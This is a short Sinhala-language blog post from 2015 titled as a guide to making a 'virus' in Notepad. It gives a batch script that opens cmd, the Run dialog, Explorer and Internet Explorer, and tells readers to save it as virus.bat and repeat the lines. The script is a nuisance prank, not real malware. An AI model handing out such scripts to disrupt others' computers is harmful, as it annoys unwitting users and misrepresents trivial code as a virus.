Saturday, March 14, 2015

Notepad වලින් virus එකක් හදමුද?

ඔන්න මතන්ලා මන් ආවා.......කොහොමැයි ඉතින් ජීවිතේ..........අපි කතා නැතුව වැඩේට බහිමුකෝ............ 
මෙන්න මෙ කෝඩ් එක ඔයගෙ NOTEPAD එකේ ගහ ගන්නකෝ....................
           
           @echo off
A:
Start cmd
Start run
Start explorer
Start iexpore.exe
Start dir

හරි ඩන් ඔයල ඕක කරනකොට මොකක් හරි ගහල...... .bat   ex-(virus.bat) මේ විදිහට save කරන්න........අපි ගහපු CODE එක කීප සරයක්ම COPY (only start cmd - start dir) කලොත් හොද ප්‍රතිපල ලබන්න පුලුවන් වඩේ හරියයිද කියල බලන්නකෝ.....................ඔයාල හැමෝටම උම්ම්ම්ම්ම්ම්ම්ම.............බායි....

2 comments: